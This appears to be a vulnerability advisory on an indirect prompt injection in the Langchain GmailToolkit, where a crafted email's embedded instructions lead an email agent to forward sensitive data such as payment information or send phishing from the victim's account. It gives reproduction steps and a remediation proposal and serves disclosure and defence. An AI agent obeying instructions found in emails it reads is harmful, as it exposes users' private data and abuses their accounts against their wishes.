Langchain Gmail Toolkit Remote Indirect Prompt Injection Vulnerability Allowing Code Execution

A remote indirect prompt injection vulnerability has been identified in the Langchain GmailToolkit component, specifically in version 0.3.51 and prior. This vulnerability allows attackers to execute arbitrary code by sending a crafted email that is processed by an email agent created with Langchain. The agent unconditionally executes commands derived from the email content, leading to unauthorized actions such as forwarding sensitive emails or sending phishing messages from the victim's account.

Impact

Exploitation of this vulnerability allows for remote control of the victim's email agent, with the potential to access and forward sensitive emails, send phishing messages using the victim's account, and consume the victim's token budget.

Reproduction

To reproduce this vulnerability, first set up a Langchain email agent using the GmailToolkit. After the agent is created, send a malicious email to the victim's inbox from another account. The email should contain instructions for the agent to follow, such as extracting payment information from a Google email and forwarding it to the attacker's account. Once the email is received, invoke the agent to read and analyze the email content. The agent will execute the instructions embedded in the email, resulting in the unauthorized forwarding of private information.

Remediation

It is recommended to introduce an intent-verification module that audits the outputs of the language model and ensures that API calls align directly with the user's instructions. This could prevent the agent from executing commands based on untrusted email content.